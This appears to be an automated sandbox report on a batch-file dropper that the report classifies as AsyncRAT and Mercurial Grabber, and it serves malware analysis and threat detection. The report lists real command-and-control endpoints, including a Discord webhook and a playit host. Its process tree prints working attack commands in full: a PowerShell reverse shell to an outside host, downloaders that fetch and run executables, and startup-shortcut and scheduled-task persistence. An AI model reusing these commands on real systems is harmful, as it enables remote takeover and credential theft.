asyncrat | b79c63a1f5777b977a48085de65f8041d1d6b2d5d569224b0f81b343578f1803

General

Target

create.bat
Size

953B
MD5

a34e9091b3cb1b1fddb64dd1e6eafe8b
SHA1

73a9ce1190dbf81871d72cc98b7d81487bad17dc
SHA256

b79c63a1f5777b977a48085de65f8041d1d6b2d5d569224b0f81b343578f1803
SHA512

65391766927605aef01be482578b0f11fc9a9dfd0ee0b0a62ff1df6d07346a4b6d5a0d7409983f3fcd7b8a98e5376fd15bc8961b477be683e88ddf8e5619d0b7

Score

10^/10

asyncrat mercurialgrabber default evasion execution rat spyware stealer

Malware Config

Extracted

Family

mercurialgrabber

C2

https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0

Extracted

Family

asyncrat

Botnet

Default

C2

technical-southwest.gl.at.ply.gg:58694

Attributes

delay
1
install
true
install_file
WINDOWS.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
stealer mercurialgrabber
Mercurialgrabber family
mercurialgrabber

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Loader.exe	family_asyncrat

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

output.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions output.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	output.exe

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow	pid	process
11	2136	powershell.exe
21	2136	powershell.exe
25	2136	powershell.exe
31	4076	powershell.exe
32	4076	powershell.exe
34	552	powershell.exe
36	552	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1752 powershell.exe
2136 powershell.exe
2104 powershell.exe
4076 powershell.exe
552 powershell.exe
Downloads MZ/PE file
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

output.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools output.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

output.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion output.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Loader.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Loader.exe

pid	process
1752	powershell.exe
2136	powershell.exe
2104	powershell.exe
4076	powershell.exe
552	powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools	output.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	output.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Loader.exe

Drops startup file 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk	powershell.exe

Executes dropped EXE 3 IoCs

Processes:

output.exeLoader.exeWINDOWS.exe

pid process

1912 output.exe
5024 Loader.exe
4356 WINDOWS.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

33 ip4.seeip.org
54 ip-api.com

pid	process
1912	output.exe
5024	Loader.exe
4356	WINDOWS.exe

flow	ioc
33	ip4.seeip.org
54	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

output.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	output.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	output.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

output.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S output.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	output.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

output.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	output.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1096 timeout.exe

pid	process
1096	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

output.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	output.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3604 schtasks.exe

pid	process
3604	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeLoader.exeWINDOWS.exe

pid	process
2136	powershell.exe
2136	powershell.exe
4076	powershell.exe
4076	powershell.exe
2104	powershell.exe
2104	powershell.exe
552	powershell.exe
552	powershell.exe
1752	powershell.exe
1752	powershell.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
5024	Loader.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe
4356	WINDOWS.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeoutput.exepowershell.exeLoader.exeWINDOWS.exe

description	pid	process
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	1912	output.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	5024	Loader.exe
Token: SeDebugPrivilege	5024	Loader.exe
Token: SeDebugPrivilege	4356	WINDOWS.exe
Token: SeDebugPrivilege	4356	WINDOWS.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

cmd.exepowershell.execmd.exeLoader.execmd.execmd.exe

description	pid	process	target process
PID 4620 wrote to memory of 2136	4620	cmd.exe	powershell.exe
PID 4620 wrote to memory of 2136	4620	cmd.exe	powershell.exe
PID 2136 wrote to memory of 1360	2136	powershell.exe	cmd.exe
PID 2136 wrote to memory of 1360	2136	powershell.exe	cmd.exe
PID 1360 wrote to memory of 4076	1360	cmd.exe	powershell.exe
PID 1360 wrote to memory of 4076	1360	cmd.exe	powershell.exe
PID 1360 wrote to memory of 2104	1360	cmd.exe	powershell.exe
PID 1360 wrote to memory of 2104	1360	cmd.exe	powershell.exe
PID 1360 wrote to memory of 1912	1360	cmd.exe	output.exe
PID 1360 wrote to memory of 1912	1360	cmd.exe	output.exe
PID 1360 wrote to memory of 552	1360	cmd.exe	powershell.exe
PID 1360 wrote to memory of 552	1360	cmd.exe	powershell.exe
PID 1360 wrote to memory of 1752	1360	cmd.exe	powershell.exe
PID 1360 wrote to memory of 1752	1360	cmd.exe	powershell.exe
PID 1360 wrote to memory of 5024	1360	cmd.exe	Loader.exe
PID 1360 wrote to memory of 5024	1360	cmd.exe	Loader.exe
PID 5024 wrote to memory of 2260	5024	Loader.exe	cmd.exe
PID 5024 wrote to memory of 2260	5024	Loader.exe	cmd.exe
PID 5024 wrote to memory of 3552	5024	Loader.exe	cmd.exe
PID 5024 wrote to memory of 3552	5024	Loader.exe	cmd.exe
PID 2260 wrote to memory of 3604	2260	cmd.exe	schtasks.exe
PID 2260 wrote to memory of 3604	2260	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 1096	3552	cmd.exe	timeout.exe
PID 3552 wrote to memory of 1096	3552	cmd.exe	timeout.exe
PID 3552 wrote to memory of 4356	3552	cmd.exe	WINDOWS.exe
PID 3552 wrote to memory of 4356	3552	cmd.exe	WINDOWS.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\create.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile -ExecutionPolicy Bypass -Command "$LHOST = 'radio-ebay.gl.at.ply.gg'; $LPORT = 10404; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) } catch { $_ }; $StreamWriter.Write('$Output`n'); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loader.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/DD/releases/download/D/output.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2104
  - - C:\Users\Admin\Desktop\output.exe
      C:\Users\Admin\Desktop\output.exe
      4⤵
      Looks for VirtualBox Guest Additions in registry
      Looks for VMWare Tools registry key
      Checks BIOS information in registry
      Executes dropped EXE
      Maps connected drives based on registry
      Checks SCSI registry key(s)
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious use of AdjustPrivilegeToken
      PID:1912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1752
  - - C:\Users\Admin\Desktop\Loader.exe
      C:\Users\Admin\Desktop\Loader.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5024
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2260
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3604
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEC06.tmp.bat""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3552
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:1096
      - C:\Users\Admin\AppData\Roaming\WINDOWS.exe
        
        "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Virtualization/Sandbox Evasion

2

T1497

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

7

T1082

Virtualization/Sandbox Evasion

2

T1497

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3df110e480ee96b0eb33e2a49b6e9c38

SHA1
ab63f7e1cae2e3c353480cf9649ed003f297f02c

SHA256
6e681c03c4803b75a721a4439acf24c12b774dea7c652f6feffe57466e3d056c

SHA512
37287132e7a1cf3ee34d12db777fe1c067f79bc82dda78a9bca31880fa1937a9230d309b7dd04a541c33c8523063c038ef943673bffd36d3e276cc157383fcee

Download Submit
C:\Users\Admin\AppData\Local\Temp\Loader.bat

Filesize
1KB

MD5
f3f83ae17a3f81e0265b9ce7e480bd4e

SHA1
994d8d5b533fd09630b45a0d0404f65557e83d5d

SHA256
412476007cd57ca529c83c386125249fbe0952a2522f5d838ffd3fb10a6e1f74

SHA512
cc0480e5cf4b8d6ca9318f806587bf121dc8feb553263e4756b43b568cf38d93ce94a467e87878f299d3fdabc66e178c8dafa96e3e5fda51bbfd7a6b4220bf39

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dl5gmtfk.5kk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpEC06.tmp.bat

Filesize
151B

MD5
8954a2e315c7d9204581f261242435ad

SHA1
31f6742e7f7da70a2e58ad7e04e735dc84a4e611

SHA256
06a6c2e0d9540f7d5c877da3c74146797940cd40add424e541ddcecf8dfc4b6b

SHA512
87392af42a4264758e95e4645bab5970069b1fa8ccc59a93227faae17de5ee0a0ecca0722ce25281a9ad9464a858da356caf2c0348831eef98a5daa616f3bb4e

Download Submit
C:\Users\Admin\Desktop\Loader.exe

Filesize
63KB

MD5
7ceb11ebb7a55e33a82bc3b66f554e79

SHA1
8dfd574ad06ded662d92d81b72f14c1914ac45b5

SHA256
aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

SHA512
d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

Download Submit
C:\Users\Admin\Desktop\output.exe

Filesize
41KB

MD5
a0e598ec98a975405420be1aadaa3c2a

SHA1
d861788839cfb78b5203686334c1104165ea0937

SHA256
e6ac8a6dac77f9873024f50befb293b9cf6347aa2e093cd863b551d9c8da5f8d

SHA512
e5ee500a8dcddd72e727cfa24e51093cd2b088f7ef89089f1d24145baa41c1ac46bf6be73bfd8cb15e2549349da8c2547d4e391b6e3a456621524fe0f83f9585

Download Submit
memory/1912-61-0x0000000000F30000-0x0000000000F40000-memory.dmp

Filesize
64KB

Download
memory/2136-13-0x00007FF85E3C3000-0x00007FF85E3C5000-memory.dmp

Filesize
8KB

Download
memory/2136-11-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

Filesize
10.8MB

Download
memory/2136-85-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

Filesize
10.8MB

Download
memory/2136-10-0x0000029052530000-0x0000029052552000-memory.dmp

Filesize
136KB

Download
memory/2136-12-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

Filesize
10.8MB

Download
memory/2136-17-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

Filesize
10.8MB

Download
memory/2136-15-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

Filesize
10.8MB

Download
memory/2136-14-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

Filesize
10.8MB

Download
memory/2136-0-0x00007FF85E3C3000-0x00007FF85E3C5000-memory.dmp

Filesize
8KB

Download
memory/4076-36-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

Filesize
10.8MB

Download
memory/4076-21-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

Filesize
10.8MB

Download
memory/4076-23-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

Filesize
10.8MB

Download
memory/4076-22-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

Filesize
10.8MB

Download
memory/5024-79-0x0000000000AC0000-0x0000000000AD6000-memory.dmp

Filesize
88KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads